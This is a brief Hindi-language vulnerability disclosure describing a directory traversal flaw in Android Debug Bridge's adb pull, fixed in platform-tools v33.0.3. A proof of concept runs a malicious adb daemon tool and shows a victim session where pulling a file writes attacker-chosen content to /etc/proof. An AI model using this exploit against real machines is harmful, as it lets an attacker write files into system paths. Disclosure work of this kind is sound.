
Android Debug Bridge (adb) उन निर्देशिका ट्रैवर्सल हमलों के लिए असुरक्षित था जो किसी दुर्भावनापूर्ण/समझौता किए गए adb डेमन द्वारा adb pull संचालन के दौरान किए जा सकते थे।
एंड्रॉइड डीबग ब्रिज (adb) एक निर्देशिका ट्रैवर्सल हमले की चपेट में था, जिसे adb pull ऑपरेशन के दौरान दुर्भावनापूर्ण/समझौता किए गए adb डेमन द्वारा अंजाम दिया जा सकता था।
दुर्भावनापूर्ण उपकरण:
./adbdirtrav.py -lp 5111 --content "hello world" --destination-path /etc/proof
पीड़ित:
root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
cat: /etc/proof: No such file or directory
root@eedd4cb8b202:/tmp/platform-tools# ./adb connect 10.6.8.145:5111
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 10.6.8.145:5111
root@eedd4cb8b202:/tmp/platform-tools# ./adb devices
List of devices attached
10.6.8.145:5111 device
root@eedd4cb8b202:/tmp/platform-tools# ./adb pull /data/local/tmp/1 /tmp/sdfsdf
/data/local/tmp/1/: 1 file pulled, 0 skipped. 0.0 MB/s (11 bytes in 0.150s)
root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
hello world
यह प्लेटफ़ॉर्म टूल्स v33.0.3 में ठीक किया गया।